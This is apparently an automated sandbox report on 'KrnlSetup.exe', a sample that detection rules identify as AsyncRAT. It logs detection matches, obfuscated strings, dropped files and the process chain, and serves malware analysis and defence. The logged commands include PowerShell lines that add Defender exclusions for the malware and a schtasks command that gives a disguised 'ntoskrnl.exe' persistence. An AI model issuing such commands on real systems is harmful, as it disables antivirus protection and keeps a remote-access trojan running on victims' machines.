                                    Source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: C:\ProgramData\ntoskrnl.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: KrnlSetup.exe, OKwK7LhbT17LhFoV8nXoqDfY9C.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: KrnlSetup.exe, ZErofTOG7QyG2YqbzUeXCBXVgf.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: KrnlSetup.exe, ZErofTOG7QyG2YqbzUeXCBXVgf.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: ntoskrnl.exe.0.dr, OKwK7LhbT17LhFoV8nXoqDfY9C.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: ntoskrnl.exe.0.dr, ZErofTOG7QyG2YqbzUeXCBXVgf.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: ntoskrnl.exe.0.dr, ZErofTOG7QyG2YqbzUeXCBXVgf.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.KrnlSetup.exe.25e3da0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.KrnlSetup.exe.25e3da0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.KrnlSetup.exe.9f0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.KrnlSetup.exe.9f0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: KrnlSetup.exe, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.csBase64 encoded string: 'Ilvs9JyJof25dROWijKfluW5VD5GvPhQ++l5sJUhwY36aZ7t+8zWqU9zDDlLz7P3'
                                    Source: ntoskrnl.exe.0.dr, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.csBase64 encoded string: 'Ilvs9JyJof25dROWijKfluW5VD5GvPhQ++l5sJUhwY36aZ7t+8zWqU9zDDlLz7P3'
                                    Source: ntoskrnl.exe.0.dr, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: ntoskrnl.exe.0.dr, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: KrnlSetup.exe, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                    Source: KrnlSetup.exe, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/24@3/4
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnkJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
                                    Source: C:\ProgramData\ntoskrnl.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeMutant created: \Sessions\1\BaseNamedObjects\wS095JlWNJZxtKC9
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""
                                    Source: KrnlSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: KrnlSetup.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: KrnlSetup.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile read: C:\Users\user\Desktop\KrnlSetup.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\KrnlSetup.exe "C:\Users\user\Desktop\KrnlSetup.exe"
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\ProgramData\ntoskrnl.exe C:\ProgramData\ntoskrnl.exe
                                    Source: unknownProcess created: C:\ProgramData\ntoskrnl.exe "C:\ProgramData\ntoskrnl.exe"
                                    Source: unknownProcess created: C:\ProgramData\ntoskrnl.exe "C:\ProgramData\ntoskrnl.exe"
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
                                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: linkinfo.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: ntshrui.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: cscapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: avicap32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: msvfw32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
